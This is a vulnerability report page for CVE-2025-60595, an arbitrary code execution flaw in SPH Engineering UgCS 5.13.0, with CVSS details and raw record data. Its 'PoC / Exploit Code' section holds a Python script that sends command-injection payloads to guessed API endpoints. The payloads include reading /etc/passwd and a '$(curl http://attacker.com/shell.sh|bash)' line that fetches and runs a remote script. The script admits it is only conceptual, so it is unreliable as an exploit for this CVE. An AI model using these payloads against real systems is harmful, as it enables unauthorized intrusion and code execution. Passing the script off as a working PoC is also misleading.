Security Vulnerability Report
中文
CVE-2025-60595 CVSS 8.2 HIGH

CVE-2025-60595

Published: 2025-10-29 17:15:36
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

SPH Engineering UgCS 5.13.0 is vulnerable to Arbitary code execution.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

SPH Engineering UgCS 5.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-60595 PoC - UgCS 5.13.0 Arbitrary Code Execution Note: This is a conceptual demonstration for security research only. Do not use against systems without authorization. """ import requests import json TARGET_HOST = "http://target-ugcs-server.com" CVE_ID = "CVE-2025-60595" def check_vulnerability(target): """Check if target is vulnerable to CVE-2025-60595""" # Common UgCS endpoints endpoints = [ "/api/v1/task/upload", "/api/config/import", "/api/mission/parse", "/api/vehicle/connect" ] # Example malicious payload for code execution # In real scenario, this would exploit the specific vulnerability malicious_payload = { "task_name": "Test Mission", "commands": [ "; whoami > /tmp/pwned.txt #", "| cat /etc/passwd #", "$(curl http://attacker.com/shell.sh|bash)" ], "metadata": { "version": "5.13.0", "cve": CVE_ID } } print(f"[*] Testing {CVE_ID} on {target}") for endpoint in endpoints: url = target + endpoint try: response = requests.post(url, json=malicious_payload, timeout=10) print(f"[+] Sent payload to {url} - Status: {response.status_code}") # Check for indicators of successful exploitation if response.status_code == 200: # Parse response for command output or error messages data = response.json() if response.headers.get('content-type', '').find('json') >= 0 else {} if 'result' in data or 'output' in data: print(f"[!] Potential vulnerability confirmed at {url}") print(f"[*] Response: {json.dumps(data, indent=2)}") return True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {url}: {e}") print("[*] Vulnerability check completed") return False if __name__ == "__main__": import sys if len(sys.argv) > 1: check_vulnerability(sys.argv[1]) else: print(f"Usage: python3 {sys.argv[0]} <target_url>") print(f"Example: python3 {sys.argv[0]} {TARGET_HOST}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60595", "sourceIdentifier": "[email protected]", "published": "2025-10-29T17:15:36.150", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SPH Engineering UgCS 5.13.0 is vulnerable to Arbitary code execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://github.com/Clicksafeae/CVE-2025-60595/tree/main", "source": "[email protected]"}, {"url": "https://www.sphengineering.com", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.